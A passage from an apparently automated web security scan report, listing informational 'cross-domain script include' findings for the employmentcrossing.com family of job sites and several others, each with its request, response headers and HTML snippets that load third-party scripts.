Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111827

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.319. http://www.designingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3h4obslpuiqaf86r78fndl2ip2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122676

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.320. http://www.directstartv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directstartv.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.directstartv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:40:28 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: PHPSESSID=hj0vosufv45apdqnbbc9nqnia2; path=/; domain=.directstartv.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DTV_ISC=0; expires=Fri, 20-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Referrer=ds-nat-dtop-dent-ehome-none-directstartvcom-1462b; path=/; domain=.directstartv.com
Set-Cookie: Keyword=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: EngineID=deleted; expires=Thu, 21-Jan-2010 18:40:27 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitorID=148176080; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: Visits=1; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: VisitID=160462422; expires=Sat, 21-Jan-2012 18:40:28 GMT; path=/; domain=.directstartv.com
Set-Cookie: lpd=default; expires=Tue, 22-Mar-2011 18:40:28 GMT; path=/; domain=.directstartv.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- Standard -->
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
       </script>
...[SNIP]...
<!--    BEGIN percentmobile-->
   <script src="http://assets.percentmobile.com/percent_mobile.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<!--********** JAVASCRIPT **********-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

15.321. http://www.diversitycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:25 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=oh70k7g7bb01l9sdpsaq85rgq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135908

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.322. http://www.dotnetcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=r5bbu9cr0v14lapurelqu9r7t1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111450

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.323. http://www.ecommercecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jkaapevh1eqi41fjlqg0qqj0f4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122922

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.324. http://www.edfed.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edfed.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.edfed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=esnafiva63v7f9obfldsvpdko0; path=/; domain=edfed.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 154433

<script type="text/javascript" src="http://www.edfed.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.edfed.com/script/overlibmws_scroll.js"></script>
<script type="t
...[SNIP]...
<!-- Google Analytics Code for Non-Secure(HTTP) Pages Starts here -->
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
</noscript><script language='JavaScript' type='text/javascript' src='http://www.studentloanfoundation.org//tmviewbanner.php?lpgid=114&wsid=21&cid=4208&bid=351&compid=43&style=js&lpgprty=B&tp=B'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.325. http://www.editingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9718dh1vf5ni8ge10ijt7ncv93; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.326. http://www.educationcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=cv80umbmrn1jnbk6im77qu8nf1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112625

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.327. http://www.employmentauthority.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentauthority.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.employmentauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Set-Cookie: PHPSESSID=9kn8taga818pcllvqjsmhdbcj1; path=/; domain=.employmentauthority.com
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 86027

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Employment Services, Executive Employment, Executive Search Consultants, Executive Job Openings</title>
<met
...[SNIP]...
<br>
<script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.328. http://www.employmentcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ep2g7l3vs5a5pub16rrihs9jp3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

15.329. http://www.energycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.energycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:59 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=i3h90hnvarkvvcfesqumj8vhf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117799

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
